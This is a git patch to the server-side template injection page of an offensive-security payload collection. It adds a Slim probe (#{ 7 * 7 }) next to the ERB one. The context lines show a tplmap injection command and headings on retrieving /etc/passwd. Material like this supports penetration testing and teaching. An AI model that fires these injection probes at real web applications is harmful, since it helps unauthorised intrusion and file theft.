From 6a398ca5c39fe158e240d22bedf1d25556823d74 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 16 Nov 2019 17:29:55 +0100 Subject: [PATCH] Ruby: add slim --- Server Side Template Injection/README.md | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 71aa5ad..a4f48e7 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -7,7 +7,7 @@ * [Tools](#tools) * [Methodology](#methodology) * [Ruby](#ruby) - * [Basic injection](#basic-injection) + * [Basic injections](#basic-injections) * [Retrieve /etc/passwd](#retrieve--etc-passwd) * [List files and directories](#list-files-and-directories) * [Java](#java) @@ -59,12 +59,20 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment ## Ruby -### Basic injection +### Basic injections + +ERB: ```ruby <%= 7 * 7 %> ``` +Slim: + +```ruby +#{ 7 * 7 } +``` + ### Retrieve /etc/passwd ```ruby @@ -385,4 +393,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/) * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) -* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) \ No newline at end of file +* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)